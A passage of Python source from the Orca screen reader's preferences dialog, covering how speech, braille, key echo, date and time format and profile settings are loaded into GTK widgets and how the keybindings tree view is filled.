                               settings.PUNCTUATION_STYLE_NONE:
            self.get_widget("noneButton").set_active(True)
        elif prefs["verbalizePunctuationStyle"] == \
                               settings.PUNCTUATION_STYLE_SOME:
            self.get_widget("someButton").set_active(True)
        elif prefs["verbalizePunctuationStyle"] == \
                               settings.PUNCTUATION_STYLE_MOST:
            self.get_widget("mostButton").set_active(True)
        else:
            self.get_widget("allButton").set_active(True)

        if prefs["speechVerbosityLevel"] == settings.VERBOSITY_LEVEL_BRIEF:
            self.get_widget("speechBriefButton").set_active(True)
        else:
            self.get_widget("speechVerboseButton").set_active(True)

        self.get_widget("onlySpeakDisplayedTextCheckButton").set_active(
            prefs["onlySpeakDisplayedText"])

        self.get_widget("enableSpeechIndentationCheckButton").set_active(\
            prefs["enableSpeechIndentation"])

        self.get_widget("speakBlankLinesCheckButton").set_active(\
            prefs["speakBlankLines"])
        self.get_widget("speakMultiCaseStringsAsWordsCheckButton").set_active(\
            prefs["speakMultiCaseStringsAsWords"])
        self.get_widget("speakNumbersAsDigitsCheckButton").set_active(
            prefs.get("speakNumbersAsDigits", settings.speakNumbersAsDigits))
        self.get_widget("enableTutorialMessagesCheckButton").set_active(\
            prefs["enableTutorialMessages"])
        self.get_widget("enablePauseBreaksCheckButton").set_active(\
            prefs["enablePauseBreaks"])
        self.get_widget("enablePositionSpeakingCheckButton").set_active(\
            prefs["enablePositionSpeaking"])
        self.get_widget("enableMnemonicSpeakingCheckButton").set_active(\
            prefs["enableMnemonicSpeaking"])
        self.get_widget("speakMisspelledIndicatorCheckButton").set_active(
            prefs.get("speakMisspelledIndicator", settings.speakMisspelledIndicator))
        self.get_widget("speakDescriptionCheckButton").set_active(
            prefs.get("speakDescription", settings.speakDescription))
        self.get_widget("speakContextBlockquoteCheckButton").set_active(
            prefs.get("speakContextBlockquote", settings.speakContextList))
        self.get_widget("speakContextLandmarkCheckButton").set_active(
            prefs.get("speakContextLandmark", settings.speakContextLandmark))
        self.get_widget("speakContextNonLandmarkFormCheckButton").set_active(
            prefs.get("speakContextNonLandmarkForm", settings.speakContextNonLandmarkForm))
        self.get_widget("speakContextListCheckButton").set_active(
            prefs.get("speakContextList", settings.speakContextList))
        self.get_widget("speakContextPanelCheckButton").set_active(
            prefs.get("speakContextPanel", settings.speakContextPanel))
        self.get_widget("speakContextTableCheckButton").set_active(
            prefs.get("speakContextTable", settings.speakContextTable))

        enable = prefs.get("messagesAreDetailed", settings.messagesAreDetailed)
        self.get_widget("messagesAreDetailedCheckButton").set_active(enable)

        enable = prefs.get("useColorNames", settings.useColorNames)
        self.get_widget("useColorNamesCheckButton").set_active(enable)

        enable = prefs.get("readFullRowInGUITable", settings.readFullRowInGUITable)
        self.get_widget("readFullRowInGUITableCheckButton").set_active(enable)

        enable = prefs.get("readFullRowInDocumentTable", settings.readFullRowInDocumentTable)
        self.get_widget("readFullRowInDocumentTableCheckButton").set_active(enable)

        enable = prefs.get("readFullRowInSpreadSheet", settings.readFullRowInSpreadSheet)
        self.get_widget("readFullRowInSpreadSheetCheckButton").set_active(enable)

        style = prefs.get("capitalizationStyle", settings.capitalizationStyle)
        combobox = self.get_widget("capitalizationStyle")
        options = [guilabels.CAPITALIZATION_STYLE_NONE,
                   guilabels.CAPITALIZATION_STYLE_ICON,
                   guilabels.CAPITALIZATION_STYLE_SPELL]
        self.populateComboBox(combobox, options)
        if style == settings.CAPITALIZATION_STYLE_ICON:
            value = guilabels.CAPITALIZATION_STYLE_ICON
        elif style == settings.CAPITALIZATION_STYLE_SPELL:
            value = guilabels.CAPITALIZATION_STYLE_SPELL
        else:
            value = guilabels.CAPITALIZATION_STYLE_NONE
        combobox.set_active(options.index(value))

        combobox2 = self.get_widget("dateFormatCombo")
        sdtime = time.strftime
        ltime = time.localtime
        self.populateComboBox(combobox2,
          [sdtime(messages.DATE_FORMAT_LOCALE, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_DM, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_MD, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_DMY, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_MDY, ltime()),
           sdtime(messages.DATE_FORMAT_NUMBERS_YMD, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_DM, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_MD, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_DMY, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_MDY, ltime()),
           sdtime(messages.DATE_FORMAT_FULL_YMD, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_DM, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_MD, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_DMY, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_MDY, ltime()),
           sdtime(messages.DATE_FORMAT_ABBREVIATED_YMD, ltime())
          ])

        indexdate = DATE_FORMAT_LOCALE
        dateFormat = self.prefsDict["presentDateFormat"]
        if dateFormat == messages.DATE_FORMAT_LOCALE:
            indexdate = DATE_FORMAT_LOCALE
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_DM:
            indexdate = DATE_FORMAT_NUMBERS_DM
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_MD:
            indexdate = DATE_FORMAT_NUMBERS_MD
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_DMY:
            indexdate = DATE_FORMAT_NUMBERS_DMY
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_MDY:
            indexdate = DATE_FORMAT_NUMBERS_MDY
        elif dateFormat == messages.DATE_FORMAT_NUMBERS_YMD:
            indexdate = DATE_FORMAT_NUMBERS_YMD
        elif dateFormat == messages.DATE_FORMAT_FULL_DM:
            indexdate = DATE_FORMAT_FULL_DM
        elif dateFormat == messages.DATE_FORMAT_FULL_MD:
            indexdate = DATE_FORMAT_FULL_MD
        elif dateFormat == messages.DATE_FORMAT_FULL_DMY:
            indexdate = DATE_FORMAT_FULL_DMY
        elif dateFormat == messages.DATE_FORMAT_FULL_MDY:
            indexdate = DATE_FORMAT_FULL_MDY
        elif dateFormat == messages.DATE_FORMAT_FULL_YMD:
            indexdate = DATE_FORMAT_FULL_YMD
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_DM:
            indexdate = DATE_FORMAT_ABBREVIATED_DM
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_MD:
            indexdate = DATE_FORMAT_ABBREVIATED_MD
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_DMY:
            indexdate = DATE_FORMAT_ABBREVIATED_DMY
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_MDY:
            indexdate = DATE_FORMAT_ABBREVIATED_MDY
        elif dateFormat == messages.DATE_FORMAT_ABBREVIATED_YMD:
            indexdate = DATE_FORMAT_ABBREVIATED_YMD
        combobox2.set_active (indexdate)
        
        combobox3 = self.get_widget("timeFormatCombo")
        self.populateComboBox(combobox3,
          [sdtime(messages.TIME_FORMAT_LOCALE, ltime()),
           sdtime(messages.TIME_FORMAT_12_HM, ltime()),
           sdtime(messages.TIME_FORMAT_12_HMS, ltime()),
           sdtime(messages.TIME_FORMAT_24_HMS, ltime()),
           sdtime(messages.TIME_FORMAT_24_HMS_WITH_WORDS, ltime()),
           sdtime(messages.TIME_FORMAT_24_HM, ltime()),
           sdtime(messages.TIME_FORMAT_24_HM_WITH_WORDS, ltime())])
        indextime = TIME_FORMAT_LOCALE
        timeFormat = self.prefsDict["presentTimeFormat"]
        if timeFormat == messages.TIME_FORMAT_LOCALE:
            indextime = TIME_FORMAT_LOCALE
        elif timeFormat == messages.TIME_FORMAT_12_HM:
            indextime = TIME_FORMAT_12_HM
        elif timeFormat == messages.TIME_FORMAT_12_HMS:
            indextime = TIME_FORMAT_12_HMS
        elif timeFormat == messages.TIME_FORMAT_24_HMS:
            indextime = TIME_FORMAT_24_HMS
        elif timeFormat == messages.TIME_FORMAT_24_HMS_WITH_WORDS:
            indextime = TIME_FORMAT_24_HMS_WITH_WORDS
        elif timeFormat == messages.TIME_FORMAT_24_HM:
            indextime = TIME_FORMAT_24_HM
        elif timeFormat == messages.TIME_FORMAT_24_HM_WITH_WORDS:
            indextime = TIME_FORMAT_24_HM_WITH_WORDS
        combobox3.set_active (indextime)

        self.get_widget("speakProgressBarUpdatesCheckButton").set_active(
            prefs.get("speakProgressBarUpdates", settings.speakProgressBarUpdates))
        self.get_widget("brailleProgressBarUpdatesCheckButton").set_active(
            prefs.get("brailleProgressBarUpdates", settings.brailleProgressBarUpdates))
        self.get_widget("beepProgressBarUpdatesCheckButton").set_active(
            prefs.get("beepProgressBarUpdates", settings.beepProgressBarUpdates))

        interval = prefs["progressBarUpdateInterval"]
        self.get_widget("progressBarUpdateIntervalSpinButton").set_value(interval)

        comboBox = self.get_widget("progressBarVerbosity")
        levels = [guilabels.PROGRESS_BAR_ALL,
                  guilabels.PROGRESS_BAR_APPLICATION,
                  guilabels.PROGRESS_BAR_WINDOW]
        self.populateComboBox(comboBox, levels)
        comboBox.set_active(prefs["progressBarVerbosity"])

        enable = prefs["enableMouseReview"]
        self.get_widget("enableMouseReviewCheckButton").set_active(enable)

        # Braille pane.
        #
        self.get_widget("enableBrailleCheckButton").set_active( \
                        prefs["enableBraille"])
        state = prefs["brailleRolenameStyle"] == \
                            settings.BRAILLE_ROLENAME_STYLE_SHORT
        self.get_widget("abbrevRolenames").set_active(state)

        self.get_widget("disableBrailleEOLCheckButton").set_active(
            prefs["disableBrailleEOL"])

        if louis is None:
            self.get_widget( \
                "contractedBrailleCheckButton").set_sensitive(False)
        else:
            self.get_widget("contractedBrailleCheckButton").set_active( \
                prefs["enableContractedBraille"])
            # Set up contraction table combo box and set it to the
            # currently used one.
            # 
            tablesCombo = self.get_widget("contractionTableCombo")
            tableDict = braille.listTables()
            selectedTableIter = None
            selectedTable = prefs["brailleContractionTable"] or \
                             braille.getDefaultTable()
            if tableDict:
                tablesModel = Gtk.ListStore(str, str)
                names = sorted(tableDict.keys())
                for name in names:
                    fname = tableDict[name]
                    it = tablesModel.append([name, fname])
                    if os.path.join(braille.tablesdir, fname) == \
                            selectedTable:
                        selectedTableIter = it
                cell = self.planeCellRendererText
                tablesCombo.clear()
                tablesCombo.pack_start(cell, True)
                tablesCombo.add_attribute(cell, 'text', 0)
                tablesCombo.set_model(tablesModel)
                if selectedTableIter:
                    tablesCombo.set_active_iter(selectedTableIter)
                else:
                    tablesCombo.set_active(0)
            else:
                tablesCombo.set_sensitive(False)
        if prefs["brailleVerbosityLevel"] == settings.VERBOSITY_LEVEL_BRIEF:
            self.get_widget("brailleBriefButton").set_active(True)
        else:
            self.get_widget("brailleVerboseButton").set_active(True)

        self.get_widget("enableBrailleWordWrapCheckButton").set_active(
            prefs.get("enableBrailleWordWrap", settings.enableBrailleWordWrap))

        selectionIndicator = prefs["brailleSelectorIndicator"]
        if selectionIndicator == settings.BRAILLE_UNDERLINE_7:
            self.get_widget("brailleSelection7Button").set_active(True)
        elif selectionIndicator == settings.BRAILLE_UNDERLINE_8:
            self.get_widget("brailleSelection8Button").set_active(True)
        elif selectionIndicator == settings.BRAILLE_UNDERLINE_BOTH:
            self.get_widget("brailleSelectionBothButton").set_active(True)
        else:
            self.get_widget("brailleSelectionNoneButton").set_active(True)

        linkIndicator = prefs["brailleLinkIndicator"]
        if linkIndicator == settings.BRAILLE_UNDERLINE_7:
            self.get_widget("brailleLink7Button").set_active(True)
        elif linkIndicator == settings.BRAILLE_UNDERLINE_8:
            self.get_widget("brailleLink8Button").set_active(True)
        elif linkIndicator == settings.BRAILLE_UNDERLINE_BOTH:
            self.get_widget("brailleLinkBothButton").set_active(True)
        else:
            self.get_widget("brailleLinkNoneButton").set_active(True)

        enable = prefs.get("enableFlashMessages", settings.enableFlashMessages)
        self.get_widget("enableFlashMessagesCheckButton").set_active(enable)

        enable = prefs.get("flashIsPersistent", settings.flashIsPersistent)
        self.get_widget("flashIsPersistentCheckButton").set_active(enable)

        enable = prefs.get("flashIsDetailed", settings.flashIsDetailed)
        self.get_widget("flashIsDetailedCheckButton").set_active(enable)

        duration = prefs["brailleFlashTime"]
        self.get_widget("brailleFlashTimeSpinButton").set_value(duration / 1000)

        # Key Echo pane.
        #
        self.get_widget("keyEchoCheckButton").set_active( \
                        prefs["enableKeyEcho"])
        self.get_widget("enableAlphabeticKeysCheckButton").set_active(
                        prefs.get("enableAlphabeticKeys", settings.enableAlphabeticKeys))
        self.get_widget("enableNumericKeysCheckButton").set_active(
                        prefs.get("enableNumericKeys", settings.enableNumericKeys))
        self.get_widget("enablePunctuationKeysCheckButton").set_active(
                        prefs.get("enablePunctuationKeys", settings.enablePunctuationKeys))
        self.get_widget("enableSpaceCheckButton").set_active(
                        prefs.get("enableSpace", settings.enableSpace))
        self.get_widget("enableModifierKeysCheckButton").set_active( \
                        prefs["enableModifierKeys"])
        self.get_widget("enableFunctionKeysCheckButton").set_active( \
                        prefs["enableFunctionKeys"])
        self.get_widget("enableActionKeysCheckButton").set_active( \
                        prefs["enableActionKeys"])
        self.get_widget("enableNavigationKeysCheckButton").set_active( \
                        prefs["enableNavigationKeys"])
        self.get_widget("enableDiacriticalKeysCheckButton").set_active( \
                        prefs["enableDiacriticalKeys"])
        self.get_widget("enableEchoByCharacterCheckButton").set_active( \
                        prefs["enableEchoByCharacter"])
        self.get_widget("enableEchoByWordCheckButton").set_active( \
                        prefs["enableEchoByWord"])
        self.get_widget("enableEchoBySentenceCheckButton").set_active( \
                        prefs["enableEchoBySentence"])
        
        # Text attributes pane.
        #
        self._createTextAttributesTreeView()

        brailleIndicator = prefs["textAttributesBrailleIndicator"]
        if brailleIndicator == settings.BRAILLE_UNDERLINE_7:
            self.get_widget("textBraille7Button").set_active(True)
        elif brailleIndicator == settings.BRAILLE_UNDERLINE_8:
            self.get_widget("textBraille8Button").set_active(True)
        elif brailleIndicator == settings.BRAILLE_UNDERLINE_BOTH:
            self.get_widget("textBrailleBothButton").set_active(True)
        else:
            self.get_widget("textBrailleNoneButton").set_active(True)

        # Pronunciation dictionary pane.
        #
        self._createPronunciationTreeView()

        # General pane.
        #
        self.get_widget("presentToolTipsCheckButton").set_active(
            prefs["presentToolTips"])

        if prefs["keyboardLayout"] == settings.GENERAL_KEYBOARD_LAYOUT_DESKTOP:
            self.get_widget("generalDesktopButton").set_active(True)
        else:
            self.get_widget("generalLaptopButton").set_active(True)
        
        combobox = self.get_widget("sayAllStyle")
        self.populateComboBox(combobox, [guilabels.SAY_ALL_STYLE_LINE,
                                         guilabels.SAY_ALL_STYLE_SENTENCE])
        combobox.set_active(prefs["sayAllStyle"])
        self.get_widget("rewindAndFastForwardInSayAllCheckButton").set_active(
            prefs.get("rewindAndFastForwardInSayAll", settings.rewindAndFastForwardInSayAll))
        self.get_widget("structNavInSayAllCheckButton").set_active(
            prefs.get("structNavInSayAll", settings.structNavInSayAll))
        self.get_widget("sayAllContextBlockquoteCheckButton").set_active(
            prefs.get("sayAllContextBlockquote", settings.sayAllContextBlockquote))
        self.get_widget("sayAllContextLandmarkCheckButton").set_active(
            prefs.get("sayAllContextLandmark", settings.sayAllContextLandmark))
        self.get_widget("sayAllContextNonLandmarkFormCheckButton").set_active(
            prefs.get("sayAllContextNonLandmarkForm", settings.sayAllContextNonLandmarkForm))
        self.get_widget("sayAllContextListCheckButton").set_active(
            prefs.get("sayAllContextList", settings.sayAllContextList))
        self.get_widget("sayAllContextPanelCheckButton").set_active(
            prefs.get("sayAllContextPanel", settings.sayAllContextPanel))
        self.get_widget("sayAllContextTableCheckButton").set_active(
            prefs.get("sayAllContextTable", settings.sayAllContextTable))

        # Orca User Profiles
        #
        self.profilesCombo = self.get_widget('availableProfilesComboBox1')
        self.startingProfileCombo = self.get_widget('availableProfilesComboBox2')
        self.profilesComboModel = self.get_widget('model9')
        self.__initProfileCombo()
        if self.script.app:
            self.get_widget('profilesFrame').set_sensitive(False)

    def __initProfileCombo(self):
        """Repopulate the profile combo boxes and select the saved profiles.

        Refills the shared profiles list-store from the available user
        profiles (falling back to the default profile when none exist), then
        sets the active row of both the "active profile" and "starting
        profile" combo boxes from the saved preferences.
        """

        profiles = self.__getAvailableProfiles()
        self.profilesComboModel.clear()

        # An empty profile list still needs one row: the default profile.
        if not len(profiles):
            rows = [self._defaultProfile]
        else:
            rows = profiles
        for row in rows:
            self.profilesComboModel.append(row)

        active = self.prefsDict.get('activeProfile') or self._defaultProfile
        starting = self.prefsDict.get('startingProfile') or self._defaultProfile

        # Profiles are [label, name] pairs; match on the label (index 0).
        activeIndex = self.getComboBoxIndex(self.profilesCombo, active[0])
        startingIndex = self.getComboBoxIndex(self.startingProfileCombo,
                                              starting[0])
        self.profilesCombo.set_active(activeIndex)
        self.startingProfileCombo.set_active(startingIndex)

    def __getAvailableProfiles(self):
        """Return the user profiles known to the settings manager."""

        profiles = _settingsManager.availableProfiles()
        return profiles

    def _updateOrcaModifier(self):
        combobox = self.get_widget("orcaModifierComboBox")
        keystring = ", ".join(self.prefsDict["orcaModifierKeys"])
        combobox.set_active(self.getComboBoxIndex(combobox, keystring))

    def populateComboBox(self, combobox, items):
        """Replace the combo box's model with one row per item.

        Arguments:
        - combobox: the GtkComboBox to populate
        - items: the list of strings with which to populate it
        """

        newModel = Gtk.ListStore(str)
        for entry in items:
            newModel.append([entry])
        combobox.set_model(newModel)

    def getComboBoxIndex(self, combobox, searchStr, col=0):
        """Return the index of the first combo box entry equal to searchStr.

        Arguments:
        - combobox: the GtkComboBox to search.
        - searchStr: the string to search for.
        - col: the model column holding the string to compare against.

        Returns the index of the first entry in combobox with searchStr, or
        0 if not found.
        """

        model = combobox.get_model()
        node = model.get_iter_first()
        for index in range(len(model)):
            if model.get_value(node, col) == searchStr:
                return index
            node = model.iter_next(node)

        # Fall back to the first entry when there is no match.
        return 0

    def getComboBoxList(self, combobox):
        """Return [label, name] for the combo box's currently active row.

        The model is expected to hold the display label in column 0 and the
        internal name in column 1.
        """

        activeIndex = combobox.get_active()
        model = combobox.get_model()
        row = model.get_iter(activeIndex)
        label = model.get_value(row, 0)
        name = model.get_value(row, 1)
        return [label, name]

    def getKeyBindingsModelDict(self, model, modifiedOnly=True):
        """Collect keybinding rows from the tree model into a dict.

        Arguments:
        - model: the two-level keybindings tree model (group rows with one
          binding row per child)
        - modifiedOnly: when True, include only rows flagged as modified

        Returns a dict mapping handler name to a list holding one
        [key, modifier mask, modifiers used, click count] entry.
        """

        result = {}
        group = model.get_iter_first()
        while group is not None:
            row = model.iter_children(group)
            while row is not None:
                handler, wasModified = model.get(row, HANDLER, MODIF)
                if wasModified or not modifiedOnly:
                    binding = list(model.get(
                        row, KEY1, MOD_MASK1, MOD_USED1, CLICK_COUNT1))
                    result[handler] = [binding]
                row = model.iter_next(row)
            group = model.iter_next(group)

        return result

    def getModelDict(self, model):
        """Rebuild the pronunciation dictionary from a [str, str] model.

        Resets the module-level pronunciation dictionary, re-adds every
        complete (actual, replacement) pair found in the model, and returns
        the resulting dict.
        """

        pronunciation_dict.pronunciation_dict = {}
        row = model.get_iter_first()
        while row is not None:
            actual, replacement = model.get(row, ACTUAL, REPLACEMENT)
            # Skip incomplete rows (empty actual string or replacement).
            if actual and replacement:
                pronunciation_dict.setPronunciation(actual, replacement)
            row = model.iter_next(row)
        return pronunciation_dict.pronunciation_dict

    def showGUI(self):
        """Show the Orca configuration GUI window. This assumes that
        the GUI has already been created.

        Side effects: binds F1 to the help button, presents the window with
        the most recent input-event timestamp (so it takes focus), re-sorts
        the text attributes page, and retitles the window for app-specific
        preferences.
        """

        orcaSetupWindow = self.get_widget("orcaSetupWindow")

        # Let F1 activate the help button while the dialog is open.
        accelGroup = Gtk.AccelGroup()
        orcaSetupWindow.add_accel_group(accelGroup)
        helpButton = self.get_widget("helpButton")
        (keyVal, modifierMask) = Gtk.accelerator_parse("F1")
        helpButton.add_accelerator("clicked",
                                   accelGroup,
                                   keyVal,
                                   modifierMask,
                                   0)

        # Present the window with the timestamp of the triggering input
        # event so the window manager allows it to take focus; fall back
        # to the current event time when no event is available.
        try:
            ts = orca_state.lastInputEvent.timestamp
        except:
            ts = 0
        if ts == 0:
            ts = Gtk.get_current_event_time()
        orcaSetupWindow.present_with_time(ts)

        # We always want to re-order the text attributes page so that enabled
        # items are consistently at the top.
        #
        # NOTE(review): getTextAttributesView is passed as an attribute, not
        # called — presumably it is the tree view widget; confirm.
        self._setSpokenTextAttributes(
                self.getTextAttributesView,
                _settingsManager.getSetting('enabledSpokenTextAttributes'),
                True, True)

        # App-specific preferences get the application's name in the title.
        if self.script.app:
            title = guilabels.PREFERENCES_APPLICATION_TITLE % self.script.app.name
            orcaSetupWindow.set_title(title)

        orcaSetupWindow.show()

    def _initComboBox(self, combobox):
        """Initialize the given combo box to take a list of int/str pairs.

        Arguments:
        - combobox: the GtkComboBox to initialize.

        Returns the newly attached Gtk.ListStore(int, str) model.
        """

        renderer = Gtk.CellRendererText()
        combobox.pack_start(renderer, True)
        # We only want to display one column (the string), not two.
        try:
            displayCell = combobox.get_cells()[0]
            combobox.add_attribute(displayCell, 'text', 1)
        except:
            combobox.add_attribute(renderer, 'text', 1)
        listStore = Gtk.ListStore(int, str)
        combobox.set_model(listStore)

        # Force the display comboboxes to be left aligned.
        if isinstance(combobox, Gtk.ComboBoxText):
            width = combobox.size_request()[0]
            renderer.set_fixed_size(width - 29, -1)

        return listStore

    def _setKeyEchoItems(self):
        """[In]sensitize the checkboxes for the various types of key echo,
        depending upon whether the value of the key echo check button is set.
        """

        enable = self.get_widget("keyEchoCheckButton").get_active()
        self.get_widget("enableAlphabeticKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableNumericKeysCheckButton").set_sensitive(enable)
        self.get_widget("enablePunctuationKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableSpaceCheckButton").set_sensitive(enable)
        self.get_widget("enableModifierKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableFunctionKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableActionKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableNavigationKeysCheckButton").set_sensitive(enable)
        self.get_widget("enableDiacriticalKeysCheckButton").set_sensitive( \
          enable)

    def _presentMessage(self, text, interrupt=False):
        """If the text field is not None, presents the given text, optionally
        interrupting anything currently being spoken.

        Arguments:
        - text: the text to present
        - interrupt: if True, interrupt any speech currently being spoken
        """

        self.script.speakMessage(text, interrupt=interrupt)
        try:
            # Braille output is best-effort: flashTime=-1 shows the message
            # persistently, and any failure (e.g. no braille display
            # available) is deliberately ignored.
            self.script.displayBrailleMessage(text, flashTime=-1)
        except:
            pass

    def _createNode(self, appName):
        """Create a new root node in the TreeStore model with the name of the
            application.

        Arguments:
        - appName: the name of the TreeStore Node (the same of the application)

        Returns the Gtk.TreeIter of the newly appended top-level row.
        """

        bindingsModel = self.keyBindingsModel

        # Top-level rows carry the group/application name and start out
        # unmodified.
        node = bindingsModel.append(None)
        bindingsModel.set_value(node, DESCRIP, appName)
        bindingsModel.set_value(node, MODIF, False)

        return node

    def _getIterOf(self, appName):
        """Returns the Gtk.TreeIter of the TreeStore model
        that matches the application name passed as argument

        Arguments:
        - appName: a string with the name of the application of the node wanted
                    it's the same that the field DESCRIP of the model treeStore
        """

        model = self.keyBindingsModel

        for row in model:
            # Only top-level (depth 0) rows are application/group nodes.
            if model.iter_depth(row.iter) == 0 and row[DESCRIP] == appName:
                return row.iter

        return None

    def _clickCountToString(self, clickCount):
        """Given a numeric clickCount, returns a string for inclusion
        in the list of keybindings.

        Argument:
        - clickCount: the number of clicks associated with the keybinding.
        """

        clickCountString = ""
        if clickCount == 2:
            clickCountString = " (%s)" % guilabels.CLICK_COUNT_DOUBLE
        elif clickCount == 3:
            clickCountString = " (%s)" % guilabels.CLICK_COUNT_TRIPLE

        return clickCountString

    def _insertRow(self, handl, kb, parent=None, modif=False):
        """Appends a new row with the new keybinding data to the treeview

        Arguments:
        - handl:  the name of the handler associated to the keyBinding
        - kb:     the new keybinding.
        - parent: the parent node of the treeview, where to append the kb
        - modif:  whether to check the modified field or not.

        Returns a Gtk.TreeIter pointing at the new row, or None when no
        parent node (explicit or default group) is available.
        """

        model = self.keyBindingsModel

        if parent is None:
            parent = self._getIterOf(guilabels.KB_GROUP_DEFAULT)

        if parent is None:
            return None

        myiter = model.append(parent)
        if not kb.keysymstring:
            # Unbound binding: no displayable key text.
            text = None
        else:
            clickCount = self._clickCountToString(kb.click_count)
            # Compute the modifier names once and reuse them (the original
            # code called keybindings.getModifierNames twice).
            modifierNames = keybindings.getModifierNames(kb.modifiers)
            text = modifierNames + kb.keysymstring + clickCount

        model.set_value(myiter, HANDLER, handl)
        model.set_value(myiter, DESCRIP, kb.handler.description)
        model.set_value(myiter, MOD_MASK1, str(kb.modifier_mask))
        model.set_value(myiter, MOD_USED1, str(kb.modifiers))
        model.set_value(myiter, KEY1, kb.keysymstring)
        model.set_value(myiter, CLICK_COUNT1, str(kb.click_count))
        if text is not None:
            # OLDTEXT1 preserves the pre-edit display text for change
            # detection; TEXT1 is the visible column.
            model.set_value(myiter, OLDTEXT1, text)
            model.set_value(myiter, TEXT1, text)
        model.set_value(myiter, MODIF, modif)
        model.set_value(myiter, EDITABLE, True)

        return myiter

    def _insertRowBraille(self, handl, com, inputEvHand,
                          parent=None, modif=False):
        """Appends a new row with the new braille binding data to the treeview

        Arguments:
        - handl:       the name of the handler associated to the brailleBinding
        - com:         the BrlTTY command
        - inputEvHand: the inputEventHandler with the new brailleBinding
        - parent:      the parent node of the treeview, where to append the kb
        - modif:       whether to check the modified field or not.

        Returns a Gtk.TreeIter pointing at the new row, or None when no
        parent node (explicit or braille group) is available.
        """

        model = self.keyBindingsModel

        if parent is None:
            parent = self._getIterOf(guilabels.KB_GROUP_BRAILLE)
        if parent is None:
            return None

        row = model.append(parent)
        model.set_value(row, HANDLER, handl)
        model.set_value(row, DESCRIP, inputEvHand.description)
        model.set_value(row, KEY1, str(com))
        model.set_value(row, TEXT1, braille.command_name[com])
        model.set_value(row, MODIF, modif)
        # Braille bindings cannot be edited from the GUI.
        model.set_value(row, EDITABLE, False)
        return row

    def _markModified(self):
        """ Mark as modified the user custom key bindings:

        Walks every binding row (second level of the tree) and sets its
        MODIF flag when the user's saved overrides contain a binding with
        the same description. Any failure is logged, not raised.
        """

        try:
            self.script.setupInputEventHandlers()
            # keyBinds ends up holding only the user's overridden bindings.
            keyBinds = keybindings.KeyBindings()
            keyBinds = _settingsManager.overrideKeyBindings(self.script, keyBinds)
            # Reusable probe binding; only its handler description matters
            # for the "description" search below.
            keyBind = keybindings.KeyBinding(None, None, None, None)
            treeModel = self.keyBindingsModel

            myiter = treeModel.get_iter_first()
            while myiter is not None:
                iterChild = treeModel.iter_children(myiter)
                while iterChild is not None:
                    descrip = treeModel.get_value(iterChild, DESCRIP)
                    keyBind.handler = \
                        input_event.InputEventHandler(None, descrip)
                    if keyBinds.hasKeyBinding(keyBind,
                                              typeOfSearch="description"):
                        treeModel.set_value(iterChild, MODIF, True)
                    iterChild = treeModel.iter_next(iterChild)
                myiter = treeModel.iter_next(myiter)
        except:
            debug.printException(debug.LEVEL_SEVERE)

    def _populateKeyBindings(self, clearModel=True):
        """Fills the TreeView with the list of Orca keybindings

        Arguments:
        - clearModel: if True, initially clear out the key bindings model.
        """

        # Detach the model and hide the view while rebuilding so the
        # widget isn't redrawn for every inserted row.
        self.keyBindView.set_model(None)
        self.keyBindView.set_headers_visible(False)
        self.keyBindView.hide()
        if clearModel:
            self.keyBindingsModel.clear()
            self.kbindings = None

        try:
            appName = self.script.app.name
        except:
            # No associated application (general preferences).
            appName = ""

        # Three top-level groups: app-specific, default Orca, and unbound.
        iterApp = self._createNode(appName)
        iterOrca = self._createNode(guilabels.KB_GROUP_DEFAULT)
        iterUnbound = self._createNode(guilabels.KB_GROUP_UNBOUND)

        if not self.kbindings:
            self.kbindings = keybindings.KeyBindings()
            self.script.setupInputEventHandlers()
            allKeyBindings = self.script.getKeyBindings()
            defKeyBindings = self.script.getDefaultKeyBindings()
            for kb in allKeyBindings.keyBindings:
                # Skip duplicates already added ("strict" match).
                if not self.kbindings.hasKeyBinding(kb, "strict"):
                    handl = self.script.getInputEventHandlerKey(kb.handler)
                    if not defKeyBindings.hasKeyBinding(kb, "description"):
                        # Not a default binding: belongs to the app group.
                        self._insertRow(handl, kb, iterApp)
                    elif kb.keysymstring:
                        self._insertRow(handl, kb, iterOrca)
                    else:
                        self._insertRow(handl, kb, iterUnbound)
                    self.kbindings.add(kb)

        # Drop empty groups so they don't show as empty expanders.
        if not self.keyBindingsModel.iter_has_child(iterApp):
            self.keyBindingsModel.remove(iterApp)

        if not self.keyBindingsModel.iter_has_child(iterUnbound):
            self.keyBindingsModel.remove(iterUnbound)

        self._updateOrcaModifier()
        self._markModified()
        iterBB = self._createNode(guilabels.KB_GROUP_BRAILLE)
        self.bbindings = self.script.getBrailleBindings()
        for com, inputEvHand in self.bbindings.items():
            handl = self.script.getInputEventHandlerKey(inputEvHand)
            self._insertRowBraille(handl, com, inputEvHand, iterBB)

        # Reattach the populated model and restore the view.
        self.keyBindView.set_model(self.keyBindingsModel)
        self.keyBindView.set_headers_visible(True)
        self.keyBindView.expand_all()
        self.keyBindingsModel.set_sort_column_id(OLDTEXT1, Gtk.SortType.ASCENDING)
        self.keyBindView.show()

        # Keep track of new/unbound keybindings that have yet to be applied.
        #
        self.pendingKeyBindings = {}

    def _cleanupSpeechServers(self):
        """Remove unwanted factories and drivers for the current active
        factory, when the user dismisses the Orca Preferences dialog."""

        for workingFactory in self.workingFactories:
